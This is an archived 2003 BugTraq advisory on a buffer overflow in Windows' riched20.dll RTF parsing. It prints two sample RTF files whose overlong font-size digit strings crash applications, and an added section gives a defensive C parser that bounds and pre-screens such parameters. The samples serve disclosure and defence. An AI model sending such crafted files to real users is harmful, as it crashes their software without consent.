BugTraq
Riched20.DLL attribute label buffer overflow vulnerability Feb 16 2003 01:30PM
Jie Dong (Thkrdev yoursft com) (1 replies)


========================================================================

Security Defence Stdio vulnerability announcement [001]

Riched20.DLL attribute label buffer overflow vulnerability

URL: http://www.yoursft.com

Author: Thrkdev

Found date: 2003-02-01

Announce date: 2003-02-14

Affected systems: Microsoft Windows 98
                  Microsoft Windows 2000
                  Microsoft Windows XP

Perhaps this vulnerability also exists in other operating systems, but
that is untested.

EMAIL: Thkrdev (at) yoursft (dot) com [email concealed]

------------------------------------------------------------------------

Technical description:

A buffer overflow vulnerability exists in riched20.dll, which can result
in the crash of application programs that use the corresponding function
of the DLL module, but it is very difficult to turn it into a way for an
attacker to execute commands on a user's system.

This problem exists in the code that parses RTF files: there is an
overflow when handling a digit string (such as the one that sets the size
of the characters) in the file. This overflow seems not to be usable for
executing commands.

The following RTF file may result in an illegal operation:

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0
\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}

"\fs" is used to set the size of the words that follow it,
"www.yoursft.com". When the digit string that sets the font size exceeds
1024 bytes (>1024 B), it will cause the buffer overflow; and when it
exceeds 65536 bytes (>65536 B), it will probably crash the application
program.

This problem appears not only in the setting of "\fs"; other attributes
will have the same problem under similar conditions. The following RTF
file will also result in an illegal operation:

{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
\fs180 www.yoursft.com\fs20\par
}

The terrible thing is that nowadays lots of software is affected by this
vulnerability. An attacker can send a malicious message that exploits the
vulnerability; when you read that message, your program will crash.

------------------------------------------------------------------------

Security Defence Stdio is a software development / technology website,
mainly developing net security products; the software of Security Defence
Stdio, Trojan Ender, has received extensive favorable comment from users.

[ reply ]
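The parsing hazard the post describes, as an added example in C that is not code from riched20.dll or from the post's author: a control word such as \fs or \f carries a numeric parameter, and a reader that copies the parameter's digits into a fixed buffer until they run out overflows on input like the samples above. The reader below bounds both the control-word name and the digit run and rejects anything over the limit instead of truncating; a second function pre-screens a whole document and reports the longest parameter it contains, so an application can refuse a file before handing it to a rich-edit control. The limits (MAX_WORD_LEN, MAX_PARAM_DIGITS), all function names, and the constructed sample document (which reuses the post's "www.yoursft.com" text) are assumptions of this example, not part of the RTF specification or of Microsoft's code.

```c
/* Added example, not code from riched20.dll or from the post's author.
 * It shows the hazard the advisory describes in generic form, a control
 * word such as \fs or \f followed by an unbounded run of digits, and two
 * defences: a reader whose parameter buffer is bounded, and a pre-screen
 * that reports the longest numeric parameter in a document (limits and
 * function names are this example's assumptions). */
#include <ctype.h>
#include <limits.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_WORD_LEN     32  /* control words are short ASCII names        */
#define MAX_PARAM_DIGITS 6   /* a signed 16-bit value needs at most 6 chars */

typedef struct {
    char word[MAX_WORD_LEN + 1];  /* control word name, e.g. "fs"   */
    long param;                   /* numeric parameter if has_param */
    int  has_param;
} rtf_control;

/* Reads one control word at s[0] == '\\'. Returns bytes consumed, 0 if s is
 * not a control word, or -1 if the name or digit run is over its limit. The
 * vulnerable pattern is this loop without the two length checks. */
static int rtf_read_control(const char *s, rtf_control *out)
{
    size_t i = 1, n = 0, digits = 0;
    long v = 0; int neg = 0;
    if (s[0] != '\\' || !isalpha((unsigned char)s[1])) return 0;
    memset(out, 0, sizeof *out);
    while (isalpha((unsigned char)s[i])) {
        if (n >= MAX_WORD_LEN) return -1;            /* name too long */
        out->word[n++] = s[i++];
    }
    if (s[i] == '-') { neg = 1; i++; }
    while (isdigit((unsigned char)s[i])) {
        if (++digits > MAX_PARAM_DIGITS) return -1;  /* reject, do not truncate */
        v = v * 10 + (s[i++] - '0');
    }
    if (digits) { out->has_param = 1; out->param = neg ? -v : v; }
    if (s[i] == ' ') i++;            /* the delimiting space belongs to the word */
    return (int)i;
}

/* Parameter of the control word at s, or LONG_MIN if absent or rejected. */
static long rtf_param_at(const char *s)
{
    rtf_control cw;
    if (rtf_read_control(s, &cw) <= 0 || !cw.has_param) return LONG_MIN;
    return cw.param;
}

/* Pre-screen for a whole document: the longest digit run attached to any
 * control word. Hex escapes (\'hh) and control symbols (\{ \} \\) are skipped. */
static size_t rtf_longest_param(const char *rtf)
{
    size_t longest = 0;
    const char *p = rtf;
    while (*p) {
        if (*p != '\\') { p++; continue; }
        if (isalpha((unsigned char)p[1])) {
            const char *q = p + 1; size_t d = 0;
            while (isalpha((unsigned char)*q)) q++;
            if (*q == '-') q++;
            while (isdigit((unsigned char)*q)) { q++; d++; }
            if (d > longest) longest = d;
            p = q;
        } else if (p[1] == '\'') {
            p += 2;                     /* \'hh: up to two hex digits follow */
            for (int k = 0; k < 2 && isxdigit((unsigned char)*p); k++) p++;
        } else {
            p += p[1] ? 2 : 1;          /* control symbol, or a stray trailing \ */
        }
    }
    return longest;
}

/* Constructed input in the shape of the post's sample: "\fs" followed by
 * ndigits '1's before the text, run through the pre-screen. Returns 0 if
 * the document does not fit the buffer. */
static size_t rtf_screen_long_fs(size_t ndigits)
{
    static const char head[] = "{\\rtf1\\ansi\\deff0\\pard\\fs";
    static const char tail[] = " www.yoursft.com\\fs20\\par}";
    static char doc[8192];
    size_t hl = sizeof head - 1, tl = sizeof tail - 1;
    if (hl + ndigits + tl + 1 > sizeof doc) return 0;
    memcpy(doc, head, hl);
    memset(doc + hl, '1', ndigits);
    memcpy(doc + hl + ndigits, tail, tl + 1);   /* copies the NUL as well */
    return rtf_longest_param(doc);
}

int main(void)
{
    printf("\\fs18 -> %ld, \\fs1111111 -> %s\n", rtf_param_at("\\fs18 x"),
           rtf_param_at("\\fs1111111 x") == LONG_MIN ? "rejected" : "accepted");
    printf("1025-digit \\fs: pre-screen reports %zu digits\n", rtf_screen_long_fs(1025));
    return 0;
}
```

Rejecting rather than truncating matters: a parser that silently clamps a 70000-digit parameter still has to skip those digits, and the post's second sample shows the same run attached to a different control word, so the check belongs in the generic control-word reader, not in the handler for \fs alone.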
Re: Riched20.DLL attribute label buffer overflow vulnerability Feb 21 2003 10:28AM
Thor Larholm (thor pivx com) (1 replies)
Re: Riched20.DLL attribute label buffer overflow vulnerability Feb 24 2003 08:47PM
Raistlin (raistlin gioco net)
Copyright 2010, SecurityFocus